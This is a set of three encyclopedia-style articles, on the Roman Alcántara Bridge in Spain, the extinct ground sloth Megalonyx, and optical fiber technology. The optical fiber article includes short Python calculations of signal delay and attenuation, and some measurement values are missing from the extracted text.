18236523
https://en.wikipedia.org/wiki/Alc%C3%A1ntara%20Bridge
Alcántara Bridge
The Alcántara Bridge (also known as Trajan's Bridge at Alcantara) is a Roman bridge at Alcántara, in Extremadura, Spain. Alcántara is from the Arabic word al-Qantarah (القنطرة) meaning "the arch". The stone arch bridge was built over the Tagus River between 104 and 106 AD on the orders of the Roman emperor Trajan, issued in 98.

History
The Alcántara Bridge has suffered more damage from war than from the elements over the years. The Moors destroyed one of the smallest arches in 1214, although this was rebuilt centuries later, in 1543, with stone taken from the original quarries. The second arch on the northwest side was destroyed in 1760 by the Spanish to halt the advancing Portuguese and was repaired in 1762 by Charles III, only to be blown up again in 1809 by Wellington's forces attempting to stop the French. Temporary repairs were made in 1819, but much of the bridge was destroyed yet again in 1836 by the Carlists. The bridge was rebuilt in 1860 using mortared masonry. Following completion of the José María de Oriol Dam, which allowed the Tagus riverbed to be drained, the main pillars were completely repaired in 1969. The bridge originally measured in length, which today is reduced to . The clear spans of the six arches from the right to the left riverside are , , , , and .

Construction
The bridge's construction occurred in the ancient Roman province of Lusitania. In Ancient Rome, the costs of building and repairing bridges, known as opus pontis ("bridge work"), were the responsibility of multiple local municipalities. These shared costs show that Roman bridges belonged to the region as a whole, not to any one town (or two, if the bridge stood on a border). The Alcántara Bridge was built at the expense of 12 local municipalities in Lusitania, whose names were recorded in an inscription on the archway over the central pier.
Technology
Bridges
null
3367910
https://en.wikipedia.org/wiki/Megalonyx
Megalonyx
Megalonyx (Greek, "great-claw") is an extinct genus of ground sloths of the family Megalonychidae, native to North America. It evolved during the Pliocene Epoch and became extinct at the end of the Late Pleistocene, living from ~5 million to ~13,000 years ago. The type species, M. jeffersonii (also called Jefferson's ground sloth), the youngest and largest known species, measured about in length and weighed up to . Megalonyx is suggested to have descended from Pliometanastes, a genus of ground sloth that had arrived in North America during the Late Miocene around 9 million years ago, prior to the main phase of the Great American Interchange. Megalonyx had the widest distribution of any North American ground sloth, with a range encompassing most of the contiguous United States and extending as far north as Alaska during warm interglacial periods. Megalonyx is notable for having been originally described by future U.S. President Thomas Jefferson in 1799 based on remains found in West Virginia; the species M. jeffersonii was described later and named in his honor. Megalonyx became extinct as part of the end-Pleistocene extinction event, simultaneously with all other mainland ground sloths and most other large mammals native to the Americas. These extinctions followed the arrival of humans in the Americas, and there is evidence that humans interacted with Megalonyx, including butchering its remains shortly prior to its extinction.

Taxonomy
In 1796, Colonel John Stuart sent Thomas Jefferson, shortly before he took office as Vice President of the United States, some fossil bones: a femur fragment, an ulna, a radius, and foot bones including three large claws. The discoveries were made in a cave in Greenbrier County, Virginia (presently West Virginia). Jefferson examined the bones and presented his observations in the paper "A Memoir on the Discovery of Certain Bones of a Quadruped of the Clawed Kind in the Western Parts of Virginia" to the American Philosophical Society in Philadelphia on March 10, 1797. The paper was published in 1799, in the same volume as an accompanying paper by his colleague Caspar Wistar, who provided detailed anatomical information about the bones and illustrated them. Together these two papers are considered the first North American publications devoted to paleontology. In the 1799 paper, Jefferson named the then-unknown animal Megalonyx ("great-claw") and compared each recovered bone to the corresponding bone in a lion. In his original draft of the paper, Jefferson thought the animal was a carnivore, one of the large cats, writing “Let us only say then, what we may safely say, that he was more than three times as large as the lion”. In a postscript, composed after learning of Baron Georges Cuvier's description and illustration of the giant ground sloth Megatherium, discovered in Argentina (mistakenly referred to as Paraguay), Jefferson revised his interpretation and compared Megalonyx to Megatherium. Contrary to Cuvier's view that extinction had played an important role in natural history, an idea that would reach scientific consensus decades later, Jefferson wrote about a "completeness of nature" whose inherent balance did not allow species to go extinct naturally. He asked Lewis and Clark, as they planned their famous expedition of 1804–1806, to keep an eye out for living specimens of Megalonyx, as this would support his case. His idea made no headway and was later shown to be incorrect.
However, Jefferson's notion that humans and Megalonyx co-existed in North America has been shown to be correct, as some bones of Megalonyx show marks made by flint tools. His presentation to the American Philosophical Society in 1797 is often credited as the beginning of vertebrate paleontology in North America. In 1799, Caspar Wistar correctly identified the remains as those of a giant ground sloth. In 1822, Desmarest named the species Megatherium jeffersonii in honor of the former statesman and scientist, although he classified it in the genus Megatherium rather than Megalonyx. Richard Harlan in 1825 revived the genus Megalonyx with the type species M. jeffersonii and provided additional taxonomic description. Scientific papers variously give the authority for the genus as Jefferson 1799 (after Jefferson's original naming of the genus) or Harlan 1825. Most authors gave Jefferson as the authority for the genus until a 1942 paper by George Gaylord Simpson, who argued that the attribution of the authority to Jefferson “is certainly erroneous” and that Harlan “may have been the first to use the name in a valid Linnaean form”. A 2024 review paper by Loren E. Babcock found that Simpson's views were mistaken and clarified that Jefferson was the valid author of the genus, as the description was done in accordance with the rules of taxonomic nomenclature at the time, even though he did not assign a species to it.

Recent research confirms that the sloth bones were discovered in Haynes Cave in Monroe County, West Virginia. For many decades in the twentieth century, the reported origin of Jefferson's "Certain Bones" was Organ Cave in what is now Greenbrier County, West Virginia. This story was popularized in the 1920s by a local man, Andrew Price of Marlinton. The story came under scrutiny when, in 1993, two fragments of a Megalonyx scapula were found in Haynes Cave in neighboring Monroe County. Smithsonian paleontologist Frederick Grady presented evidence in 1995 confirming Haynes Cave as the original source of Jefferson's fossil. Jefferson reported that the bones had been found by saltpeter workers. He gave the cave owner's name as Frederic Crower. Correspondence between Jefferson and Colonel Stuart, who sent him the bones, indicates that the cave was located about five miles from Stuart's home and that it contained saltpeter vats. An investigation of property ownership records revealed "Frederic Crower" to be an apparent misspelling of the name Frederic Gromer. Organ Cave was never owned by Gromer, but Haynes Cave was. Two letters written by Tristram Patton, the subsequent owner of Haynes Cave, indicate that this cave was located in Monroe County near Second Creek. Monroe County had originally been part of Greenbrier County; it became a separate county shortly after the discovery of the bones. In his own letters Patton described the cave and indicated that more fossil bones remained inside.

M. jeffersonii is still the most commonly identified species of Megalonyx. It was designated the state fossil of West Virginia in 2008. M. leptostomus, named by Cope (1893), lived from the Blancan to the Irvingtonian. This species ranged from Florida to Texas, north to Kansas and Nebraska, and west to New Mexico, Nevada, Oregon, and Washington. It was about half the size of M. jeffersonii. It evolved into M. wheatleyi, the direct ancestor of M. jeffersonii. Species gradually became larger over time, with species distinctions mostly based on size and geologic age.
Evolution
The first wave of megalonychids came to North America by island-hopping across the Central American Seaway from South America, where ground sloths arose, prior to the formation of the Panamanian land bridge. Based on molecular results, their closest living relatives are the three-toed sloths (Bradypus); earlier morphological investigations came to a different conclusion. Megalonyx is thought to be descended from Pliometanastes, a ground sloth that arrived in North America during the late Miocene, around 9 million years ago. The earliest representatives of Megalonyx appeared during the Pliocene. M. jeffersonii lived from the late Middle Pleistocene/late Irvingtonian (250,000–300,000 years ago) through the Rancholabrean of the Late Pleistocene (11,000 BP). M. jeffersonii was probably descended from M. wheatleyi. The Megalonyx lineage increased in size with time, the last species, M. jeffersonii, being the largest.

Description
Megalonyx jeffersonii was a large, heavily built herbivore about long. It was comparable in size to a cow, with some specimens estimated to exceed in mass. The hind limbs were plantigrade (flat-footed) and this, along with its stout tail, allowed it to rear up into a semi-erect position to feed. The hands had three large claws, which were likely used for grasping and defense. The teeth of Megalonyx jeffersonii were hypselodont (high-crowned).

Paleobiology
During excavations at Tarkio Valley in southwest Iowa, an adult (presumably female) Megalonyx jeffersonii was found in direct association with two juveniles of different ages, the older suggested to be around 3–4 years old, suggesting that adults cared for young of different generations. A 2022 study estimated, based on the ages of the adult and the two juveniles, that the average lifespan was approximately 19 years, that sexual maturity occurred at about six and a half years, that gestation lasted around 14 months, and that the interval between births was approximately 3 years. Megalonyx is thought to have been a browser.

Habitat
Megalonyx jeffersonii ranged over much of North America, its range spanning nearly the whole contiguous United States and parts of southern Canada, with some remains known as far south as central Mexico. Remains have been found as far north as Alaska and the Yukon during interglacial intervals, and the sloth ranged as far northeast as New York. In 2010, a specimen was discovered at the Ziegler Reservoir site near Snowmass Village, Colorado, in the Rocky Mountains at an elevation of . The habitat of Megalonyx jeffersonii was highly variable, but often associated with spruce-dominated, mixed conifer-hardwood forest.

Extinction
Megalonyx jeffersonii became extinct at the end of the Pleistocene, as part of the Quaternary extinction event, in which all other mainland ground sloths and most other large mammals of the Americas became extinct. The youngest confirmed radiocarbon date is from Ohio, dating to 13,180–13,034 calibrated years Before Present. This timing was coincident with both the Younger Dryas and a major growth in the population of recently arrived Paleoindians. In Ohio, a specimen of Megalonyx jeffersonii dubbed the "Firelands Ground Sloth", dating to around 13,738 to 13,435 calibrated years Before Present (~11,788 to 11,485 BCE), was found with cut marks indicative of butchery, suggesting that hunting may have played a role in its extinction.
Biology and health sciences
Xenarthra
Animals
3372377
https://en.wikipedia.org/wiki/Optical%20fiber
Optical fiber
An optical fiber, or optical fibre, is a flexible glass or plastic fiber that can transmit light from one end to the other. Such fibers find wide usage in fiber-optic communications, where they permit transmission over longer distances and at higher bandwidths (data transfer rates) than electrical cables. Fibers are used instead of metal wires because signals travel along them with less loss and are immune to electromagnetic interference. Fibers are also used for illumination and imaging, and are often wrapped in bundles so they may be used to carry light into, or images out of, confined spaces, as in the case of a fiberscope. Specially designed fibers are also used for a variety of other applications, such as fiber optic sensors and fiber lasers. Glass optical fibers are typically made by drawing, while plastic fibers can be made either by drawing or by extrusion.

Optical fibers typically include a core surrounded by a transparent cladding material with a lower index of refraction. Light is kept in the core by the phenomenon of total internal reflection, which causes the fiber to act as a waveguide. Fibers that support many propagation paths or transverse modes are called multi-mode fibers, while those that support a single mode are called single-mode fibers (SMF). Multi-mode fibers generally have a wider core diameter and are used for short-distance communication links and for applications where high power must be transmitted. Single-mode fibers are used for most communication links longer than .

Being able to join optical fibers with low loss is important in fiber optic communication. This is more complex than joining electrical wire or cable and involves careful cleaving of the fibers, precise alignment of the fiber cores, and the coupling of these aligned cores. For applications that demand a permanent connection, a fusion splice is common. In this technique, an electric arc is used to melt the ends of the fibers together. Another common technique is a mechanical splice, where the ends of the fibers are held in contact by mechanical force. Temporary or semi-permanent connections are made by means of specialized optical fiber connectors. The field of applied science and engineering concerned with the design and application of optical fibers is known as fiber optics. The term was coined by Indian-American physicist Narinder Singh Kapany.

History
Daniel Colladon and Jacques Babinet first demonstrated the guiding of light by refraction, the principle that makes fiber optics possible, in Paris in the early 1840s. John Tyndall included a demonstration of it in his public lectures in London 12 years later. Tyndall also wrote about the property of total internal reflection in an introductory book about the nature of light in 1870. In the late 19th century, a team of Viennese doctors guided light through bent glass rods to illuminate body cavities. Practical applications, such as close internal illumination during dentistry, followed early in the twentieth century. Image transmission through tubes was demonstrated independently by the radio experimenter Clarence Hansell and the television pioneer John Logie Baird in the 1920s. In the 1930s, Heinrich Lamm showed that one could transmit images through a bundle of unclad optical fibers and used it for internal medical examinations, but his work was largely forgotten. In 1953, Dutch scientist Bram van Heel first demonstrated image transmission through bundles of optical fibers with a transparent cladding.
Later that same year, Harold Hopkins and Narinder Singh Kapany at Imperial College in London succeeded in making image-transmitting bundles with over 10,000 fibers, and subsequently achieved image transmission through a 75 cm long bundle which combined several thousand fibers. The first practical fiber optic semi-flexible gastroscope was patented by Basil Hirschowitz, C. Wilbur Peters, and Lawrence E. Curtiss, researchers at the University of Michigan, in 1956. In the process of developing the gastroscope, Curtiss produced the first glass-clad fibers; previous optical fibers had relied on air or impractical oils and waxes as the low-index cladding material. Kapany coined the term fiber optics after writing a 1960 article in Scientific American that introduced the topic to a wide audience, and he subsequently wrote the first book about the new field.

The first working fiber-optic data transmission system was demonstrated by German physicist Manfred Börner at Telefunken Research Labs in Ulm in 1965, followed by the first patent application for this technology in 1966. In 1968, NASA used fiber optics in the television cameras that were sent to the moon. At the time, the use in the cameras was classified confidential, and employees handling the cameras had to be supervised by someone with an appropriate security clearance.

In 1965, Charles K. Kao and George A. Hockham of the British company Standard Telephones and Cables (STC) were the first to promote the idea that the attenuation in optical fibers could be reduced below 20 decibels per kilometer (dB/km), which would make fibers a practical communication medium. They proposed that the attenuation in fibers available at the time was caused by impurities that could be removed, rather than by fundamental physical effects such as scattering. They correctly and systematically theorized the light-loss properties of optical fiber and pointed out the right material to use for such fibers: silica glass with high purity. This discovery earned Kao the Nobel Prize in Physics in 2009. The crucial attenuation limit of 20 dB/km was first achieved in 1970 by researchers Robert D. Maurer, Donald Keck, Peter C. Schultz, and Frank Zimar working for American glass maker Corning Glass Works. They demonstrated a fiber with 17 dB/km attenuation by doping silica glass with titanium. A few years later they produced a fiber with only 4 dB/km attenuation using germanium dioxide as the core dopant.

In 1981, General Electric produced fused quartz ingots that could be drawn into strands long. Initially, high-quality optical fibers could only be manufactured at 2 meters per second. Chemical engineer Thomas Mensah joined Corning in 1983 and increased the speed of manufacture to over 50 meters per second, making optical fiber cables cheaper than traditional copper ones. These innovations ushered in the era of optical fiber telecommunication. The Italian research center CSELT worked with Corning to develop practical optical fiber cables, resulting in the first metropolitan fiber optic cable being deployed in Turin in 1977. CSELT also developed an early technique for splicing optical fibers, called Springroove. Attenuation in modern optical cables is far less than in electrical copper cables, leading to long-haul fiber connections with repeater distances of . In 1986 and 1987 respectively, two teams, led by David N. Payne of the University of Southampton and Emmanuel Desurvire at Bell Labs, developed the erbium-doped fiber amplifier, which reduced the cost of long-distance fiber systems by reducing or eliminating optical-electrical-optical repeaters.

The emerging field of photonic crystals led to the development in 1991 of photonic-crystal fiber, which guides light by diffraction from a periodic structure, rather than by total internal reflection. The first photonic crystal fibers became commercially available in 2000. Photonic crystal fibers can carry higher power than conventional fibers, and their wavelength-dependent properties can be manipulated to improve performance. These fibers can have hollow cores.

Uses
Communication
Optical fiber is used as a medium for telecommunication and computer networking because it is flexible and can be bundled as cables. It is especially advantageous for long-distance communications, because infrared light propagates through the fiber with much lower attenuation than electricity in electrical cables. This allows long distances to be spanned with few repeaters. Per-channel data rates of 10 or 40 Gbit/s are typical in deployed systems. Through the use of wavelength-division multiplexing (WDM), each fiber can carry many independent channels, each using a different wavelength of light. The net data rate (data rate without overhead bytes) per fiber is the per-channel data rate reduced by the forward error correction (FEC) overhead, multiplied by the number of channels (usually up to 80 in commercial dense WDM systems).

For short-distance applications, such as a network in an office building (see fiber to the office), fiber-optic cabling can save space in cable ducts. This is because a single fiber can carry much more data than electrical cables such as standard category 5 cable, which typically runs at 100 Mbit/s or 1 Gbit/s speeds. Fibers are often also used for short-distance connections between devices. For example, most high-definition televisions offer a digital audio optical connection. This allows the streaming of audio over light, using the S/PDIF protocol over an optical TOSLINK connection.

Sensors
Fibers have many uses in remote sensing. In some applications, the fiber itself is the sensor, channeling light to a processing device that analyzes changes in the light's characteristics. In other cases, fiber is used to connect a sensor to a measurement system. Optical fibers can be used as sensors to measure strain, temperature, pressure, and other quantities by modifying a fiber so that the property being measured modulates the intensity, phase, polarization, wavelength, or transit time of light in the fiber. Sensors that vary the intensity of light are the simplest, since only a simple source and detector are required. A particularly useful feature of such fiber optic sensors is that they can, if required, provide distributed sensing along the fiber, with spatial resolution on the order of one meter. Distributed acoustic sensing is one example of this. In contrast, highly localized measurements can be provided by integrating miniaturized sensing elements with the tip of the fiber. These can be implemented by various micro- and nanofabrication technologies, such that they do not exceed the microscopic boundary of the fiber tip, allowing for such applications as insertion into blood vessels via hypodermic needle.
Extrinsic fiber optic sensors use an optical fiber cable, normally a multi-mode one, to transmit modulated light from either a non-fiber optical sensor or an electronic sensor connected to an optical transmitter. A major benefit of extrinsic sensors is their ability to reach otherwise inaccessible places. An example is the measurement of temperature inside jet engines, using a fiber to transmit radiation to a pyrometer outside the engine. Extrinsic sensors can be used in the same way to measure the internal temperature of electrical transformers, where the extreme electromagnetic fields present make other measurement techniques impossible. Extrinsic sensors measure vibration, rotation, displacement, velocity, acceleration, torque, and torsion. A solid-state version of the gyroscope, using the interference of light, has been developed: the fiber optic gyroscope (FOG) has no moving parts and exploits the Sagnac effect to detect mechanical rotation. Common uses for fiber optic sensors include advanced intrusion detection security systems, in which light is transmitted along a fiber optic sensor cable placed on a fence, pipeline, or communication cabling, and the returned signal is monitored, digitally processed to detect disturbances, and used to trip an alarm if an intrusion has occurred. Optical fibers are widely used as components of optical chemical sensors and optical biosensors.

Power transmission
Optical fiber can be used to transmit power using a photovoltaic cell to convert the light into electricity. While this method of power transmission is not as efficient as conventional ones, it is especially useful in situations where it is desirable not to have a metallic conductor, as in the case of use near MRI machines, which produce strong magnetic fields. Other examples are powering electronics in high-powered antenna elements and measurement devices used in high-voltage transmission equipment.

Other uses
Optical fibers are used as light guides in medical and other applications where bright light needs to be shone on a target without a clear line-of-sight path. Many microscopes use fiber-optic light sources to provide intense illumination of samples being studied. Optical fiber is also used in imaging optics. A coherent bundle of fibers is used, sometimes along with lenses, for a long, thin imaging device called an endoscope, which is used to view objects through a small hole. Medical endoscopes are used for minimally invasive exploratory or surgical procedures. Industrial endoscopes (see fiberscope or borescope) are used for inspecting anything hard to reach, such as jet engine interiors.

In some buildings, optical fibers route sunlight from the roof to other parts of the building (see nonimaging optics). Optical-fiber lamps are used for illumination in decorative applications, including signs, art, toys and artificial Christmas trees. Optical fiber is an intrinsic part of the light-transmitting concrete building product LiTraCon. Optical fiber can also be used in structural health monitoring. This type of sensor can detect stresses that may have a lasting impact on structures; it is based on the principle of measuring analog attenuation. In spectroscopy, optical fiber bundles transmit light from a spectrometer to a substance that cannot be placed inside the spectrometer itself, in order to analyze its composition. A spectrometer analyzes substances by bouncing light off and through them.
By using fibers, a spectrometer can be used to study objects remotely. An optical fiber doped with certain rare-earth elements such as erbium can be used as the gain medium of a fiber laser or optical amplifier. Rare-earth-doped optical fibers can be used to provide signal amplification by splicing a short section of doped fiber into a regular (undoped) optical fiber line. The doped fiber is optically pumped with a second laser wavelength that is coupled into the line in addition to the signal wave. Both wavelengths of light are transmitted through the doped fiber, which transfers energy from the pump wavelength to the signal wave. The process that causes the amplification is stimulated emission.

Optical fiber is also widely exploited as a nonlinear medium. The glass medium supports a host of nonlinear optical interactions, and the long interaction lengths possible in fiber facilitate a variety of phenomena, which are harnessed for applications and fundamental investigation. Conversely, fiber nonlinearity can have deleterious effects on optical signals, and measures are often required to minimize such unwanted effects. Optical fibers doped with a wavelength shifter collect scintillation light in physics experiments. Fiber-optic sights for handguns, rifles, and shotguns use pieces of optical fiber to improve the visibility of markings on the sight.

Principle of operation
An optical fiber is a cylindrical dielectric waveguide (nonconducting waveguide) that transmits light along its axis through the process of total internal reflection. The fiber consists of a core surrounded by a cladding layer, both of which are made of dielectric materials. To confine the optical signal in the core, the refractive index of the core must be greater than that of the cladding. The boundary between the core and cladding may either be abrupt, in step-index fiber, or gradual, in graded-index fiber. Light can be fed into optical fibers using lasers or LEDs.

Fiber is immune to electrical interference, as there is no cross-talk between signals in different cables and no pickup of environmental noise. Information traveling inside the optical fiber is even immune to electromagnetic pulses generated by nuclear devices. Fiber cables do not conduct electricity, which makes fiber useful for protecting communications equipment in high-voltage environments such as power generation facilities or applications prone to lightning strikes. The electrical isolation also prevents problems with ground loops. Because there is no electricity in optical cables that could potentially generate sparks, they can be used in environments where explosive fumes are present. Wiretapping (in this case, fiber tapping) is more difficult compared to electrical connections. Fiber cables are not targeted by metal thieves; in contrast, copper cable systems use large amounts of copper and have been targeted since the 2000s commodities boom.

Refractive index
The refractive index is a way of measuring the speed of light in a material. Light travels fastest in a vacuum, such as in outer space. The speed of light in vacuum is about 300,000 kilometers (186,000 miles) per second. The refractive index of a medium is calculated by dividing the speed of light in vacuum by the speed of light in that medium. The refractive index of vacuum is therefore 1, by definition. A typical single-mode fiber used for telecommunications has a cladding made of pure silica, with an index of 1.444 at 1500 nm, and a core of doped silica with an index around 1.4475.
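To put numbers on these definitions, the short Python sketch below converts the indices quoted above into a signal speed, the intercontinental delay discussed next, and the critical angle and numerical aperture covered in the following subsections. The critical-angle and NA relations are the standard step-index formulas, not expressions given in this article, and the index values are the representative ones quoted above.

```python
import math

C_KM_S = 299_792.458  # speed of light in vacuum, km/s

n_core, n_clad = 1.4475, 1.444  # representative indices quoted above

# Speed of light in the core: v = c / n
v = C_KM_S / n_core
print(f"signal speed: {v:,.0f} km/s")        # ~207,000 km/s

# Minimum one-way delay for the Sydney-New York example (16,000 km)
print(f"delay: {16_000 / v * 1000:.0f} ms")  # ~77 ms here; ~80 ms with the
                                             # 200,000 km/s rule of thumb

# Standard step-index relations (assumed, not stated in this article):
theta_c = math.degrees(math.asin(n_clad / n_core))  # critical angle
na = math.sqrt(n_core**2 - n_clad**2)               # numerical aperture
print(f"critical angle: {theta_c:.1f} deg")  # ~86.0 deg from the normal
print(f"numerical aperture: {na:.3f}")       # ~0.10, the small NA typical
                                             # of single-mode fiber
```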
The larger the index of refraction, the slower light travels in that medium. From this information, a simple rule of thumb is that a signal carried over optical fiber travels at around 200,000 kilometers per second. Thus, for a phone call carried by fiber between Sydney and New York, a 16,000-kilometer distance, there is a minimum delay of 80 milliseconds (about 1/12 of a second) between when one caller speaks and the other hears.

Total internal reflection
When light traveling in an optically dense medium hits a boundary at a steep angle of incidence (larger than the critical angle for the boundary), the light is completely reflected. This is called total internal reflection. This effect is used in optical fibers to confine light in the core. Most modern optical fiber is weakly guiding, meaning that the difference in refractive index between the core and the cladding is very small (typically less than 1%). Light travels through the fiber core, bouncing back and forth off the boundary between the core and cladding. Because the light must strike the boundary at an angle greater than the critical angle, only light that enters the fiber within a certain range of angles can travel down the fiber without leaking out. This range of angles is called the acceptance cone of the fiber. There is a maximum angle from the fiber axis at which light may enter the fiber so that it will propagate, or travel, in the core of the fiber. The sine of this maximum angle is the numerical aperture (NA) of the fiber. Fiber with a larger NA requires less precision to splice and work with than fiber with a smaller NA. The size of the acceptance cone is a function of the refractive index difference between the fiber's core and cladding. Single-mode fiber has a small NA.

Multi-mode fiber
Fiber with a large core diameter (greater than 10 micrometers) may be analyzed by geometrical optics. Such fiber is called multi-mode fiber, from the electromagnetic analysis (see below). In a step-index multi-mode fiber, rays of light are guided along the fiber core by total internal reflection. Rays that meet the core-cladding boundary at an angle (measured relative to a line normal to the boundary) greater than the critical angle for this boundary are completely reflected. The critical angle is determined by the difference in the index of refraction between the core and cladding materials. Rays that meet the boundary at a low angle are refracted from the core into the cladding, where they terminate. The critical angle determines the acceptance angle of the fiber, often reported as a numerical aperture. A high numerical aperture allows light to propagate down the fiber in rays both close to the axis and at various angles, allowing efficient coupling of light into the fiber. However, this high numerical aperture increases the amount of dispersion, as rays at different angles have different path lengths and therefore take different amounts of time to traverse the fiber.

In graded-index fiber, the index of refraction in the core decreases continuously between the axis and the cladding. This causes light rays to bend smoothly as they approach the cladding, rather than reflecting abruptly off the core-cladding boundary. The resulting curved paths reduce multi-path dispersion because high-angle rays pass more through the lower-index periphery of the core rather than through the high-index center. The index profile is chosen to minimize the difference in axial propagation speeds of the various rays in the fiber.
This ideal index profile is very close to a parabolic relationship between the index and the distance from the axis.

Single-mode fiber
Fiber with a core diameter less than about ten times the wavelength of the propagating light cannot be modeled using geometric optics. Instead, it must be analyzed as an electromagnetic waveguide structure, according to Maxwell's equations as reduced to the electromagnetic wave equation. As an optical waveguide, the fiber supports one or more confined transverse modes by which light can propagate along the fiber. Fiber supporting only one mode is called single-mode. The waveguide analysis shows that the light energy in the fiber is not completely confined in the core. Instead, especially in single-mode fibers, a significant fraction of the energy in the bound mode travels in the cladding as an evanescent wave. The most common type of single-mode fiber has a core diameter of 8–10 micrometers and is designed for use in the near infrared. Multi-mode fiber, by comparison, is manufactured with core diameters as small as 50 micrometers and as large as hundreds of micrometers.

Special-purpose fiber
Some special-purpose optical fiber is constructed with a non-cylindrical core or cladding layer, usually with an elliptical or rectangular cross-section. These include polarization-maintaining fiber used in fiber optic sensors and fiber designed to suppress whispering gallery mode propagation. Photonic-crystal fiber is made with a regular pattern of index variation (often in the form of cylindrical holes that run along the length of the fiber). Such fiber uses diffraction effects instead of, or in addition to, total internal reflection to confine light to the fiber's core. The properties of the fiber can be tailored to a wide variety of applications.

Mechanisms of attenuation
Attenuation in fiber optics, also known as transmission loss, is the reduction in the intensity of the light signal as it travels through the transmission medium. Attenuation coefficients in fiber optics are usually expressed in units of dB/km. The medium is usually a fiber of silica glass that confines the incident light beam within. Attenuation is an important factor limiting the transmission of a digital signal across large distances. Thus, much research has gone into both limiting the attenuation and maximizing the amplification of the optical signal. The four-orders-of-magnitude reduction in the attenuation of silica optical fibers over four decades was the result of constant improvement of manufacturing processes, raw material purity, and preform and fiber designs, which allowed these fibers to approach the theoretical lower limit of attenuation.

Single-mode optical fibers can be made with extremely low loss. Corning's Vascade® EX2500 fiber, a low-loss single-mode fiber for telecommunications wavelengths, has a nominal attenuation of 0.148 dB/km at 1550 nm. A 10 km length of such fiber transmits nearly 71% of optical energy at 1550 nm. Attenuation in optical fiber is caused primarily by scattering and absorption. In fibers based on fluoride glasses such as ZBLAN, minimum attenuation is limited by impurity absorption. The vast majority of optical fibers are based on silica glass, where impurity absorption is negligible. In silica fibers, attenuation is determined by intrinsic mechanisms: Rayleigh scattering in the glasses through which the light propagates, and infrared absorption in the same glasses. Absorption in silica increases steeply at wavelengths above 1570 nm.
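Because attenuation is quoted in dB/km, it converts directly into the fraction of optical power that survives a run. The minimal Python sketch below checks the figures quoted above (the 0.148 dB/km fiber over 10 km, and Kao and Hockham's 20 dB/km threshold) and includes the loss-budget arithmetic described later under Loss budget; the example link parameters at the end are illustrative, not figures from the text.

```python
def transmitted_fraction(atten_db_per_km: float, length_km: float) -> float:
    """Fraction of optical power remaining after a fiber run."""
    return 10 ** (-atten_db_per_km * length_km / 10)

# 0.148 dB/km over 10 km, the figure quoted above
print(f"{transmitted_fraction(0.148, 10):.1%}")  # 71.1%, matching the text

# Kao and Hockham's 20 dB/km practicality threshold: 1% survives each km
print(f"{transmitted_fraction(20, 1):.1%}")      # 1.0%

def link_loss_db(km: float, db_per_km: float,
                 connectors: int = 0, splices: int = 0,
                 db_per_connector: float = 0.3,
                 db_per_splice: float = 0.2) -> float:
    """Loss-budget sum described under 'Loss budget' below:
    fiber loss plus per-connector and per-splice losses."""
    return (km * db_per_km + connectors * db_per_connector
            + splices * db_per_splice)

# Illustrative link: 40 km of 0.3 dB/km fiber, 2 connectors, 4 splices
print(f"{link_loss_db(40, 0.3, connectors=2, splices=4):.1f} dB")  # 13.4 dB
```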
At wavelengths most useful for telecommunications, Rayleigh scattering is the dominant loss mechanism. At 1550 nm, the attenuation components for a record low-loss fiber are as follows:
Rayleigh scattering loss: 0.1200 dB/km
infrared absorption loss: 0.0150 dB/km
impurity absorption loss: 0.0047 dB/km
waveguide imperfection loss: 0.0010 dB/km

Light scattering
The propagation of light through the core of an optical fiber is based on total internal reflection of the lightwave, in terms of geometric optics, or on guided modes, in terms of the electromagnetic waveguide picture. In a typical single-mode optical fiber, about 75% of the light propagates through the core material, which has the higher refractive index, and about 25% propagates through the cladding, which has the lower refractive index. The interface between the core and cladding glasses is exceptionally smooth and does not give rise to a significant scattering loss or waveguide imperfection loss. The scattering loss originates primarily from Rayleigh scattering in the bulk of the glasses composing the fiber core and cladding. The scattering of light in optical quality glass fiber is caused by molecular-level irregularities (compositional fluctuations) in the glass structure. Indeed, one emerging school of thought is that glass is simply the limiting case of a polycrystalline solid. Within this framework, domains exhibiting various degrees of short-range order become the building blocks of metals as well as glasses and ceramics. Distributed both between and within these domains are micro-structural defects that provide the most ideal locations for light scattering.

Scattering depends on the wavelength of the light being scattered and on the size of the scattering centers. The angular dependence of the light intensity scattered from an optical fiber matches that of Rayleigh scattering, indicating that the scattering centers are much smaller than the wavelength of the propagating light. The scattering originates from density fluctuations driven by the fictive temperature of the glass, and from concentration fluctuations of dopants in both the core and the cladding. The Rayleigh scattering coefficient $R$ can be presented as

$R = R_d + R_c$,

where $R_d$ represents Rayleigh scattering on density fluctuations and $R_c$ represents Rayleigh scattering on dopant concentration fluctuations. Dopants, such as germanium dioxide or fluorine, are used to create the refractive index difference between the core and the cladding, to form a waveguide structure. The density-fluctuation term is

$R_d = \frac{8\pi^3}{3\lambda^4}\, n^8 p^2 \beta_T k_B T_f$,

where $\lambda$ is the wavelength, $n$ is the refractive index, $p$ is the photo-elastic coefficient, $\beta_T$ is the isothermal compressibility, $k_B$ is the Boltzmann constant, and $T_f$ is the fictive temperature. The only physically significant variable affecting scattering on density fluctuations is the fictive temperature of the glass; a lower fictive temperature results in a more homogeneous glass and lower Rayleigh scattering. The fictive temperature may be dramatically reduced by adding about 100 wt. ppm of alkali oxide dopant to the fiber core, as well as by slower cooling of the fiber during the fiber draw process. These approaches are used to produce optical fibers with the lowest attenuation, especially those for submarine telecom cables. For small dopant concentrations, $R_c$ is proportional to $x\,(\mathrm{d}n/\mathrm{d}x)^2$, where $x$ is the mole fraction of the dopant in the SiO2-based glass and $n$ is the refractive index of the glass. When GeO2 dopant is used to increase the refractive index of the fiber core, it increases the concentration-fluctuation component of Rayleigh scattering, and hence the attenuation of the fiber.
This is why the lowest-attenuation fibers do not use GeO2 in the core, and instead use fluorine in the cladding to reduce the refractive index of the cladding. In pure-silica-core fiber, $R_c$ is proportional to the overlap integral between the LP01 mode and the fluorine-induced concentration-fluctuation component in the cladding. In the core of potassium-doped pure silica-core (KPSC) fiber, only density fluctuations play a significant role, as the concentrations of K2O, fluorine and chlorine are very low. The density fluctuations in the core are moderated by the lower fictive temperature resulting from potassium doping, and are further reduced by annealing during the fiber draw process. This differs from the cladding, where higher fluorine dopant levels and the resulting concentration fluctuations add to the loss. In such fibers the light traveling through the core experiences lower scattering and lower attenuation than the light propagating through the cladding segment of the fiber. At high optical powers, scattering can also be caused by nonlinear optical processes in the fiber.

UV-Vis-IR absorption
In addition to light scattering, attenuation or signal loss can also occur due to selective absorption of specific wavelengths. Primary material considerations include both electrons and molecules, as follows:
At the electronic level, absorption depends on whether the electron orbitals are spaced (or "quantized") such that they can absorb a quantum of light (or photon) of a specific wavelength or frequency in the ultraviolet (UV) or visible ranges. This is what gives rise to color.
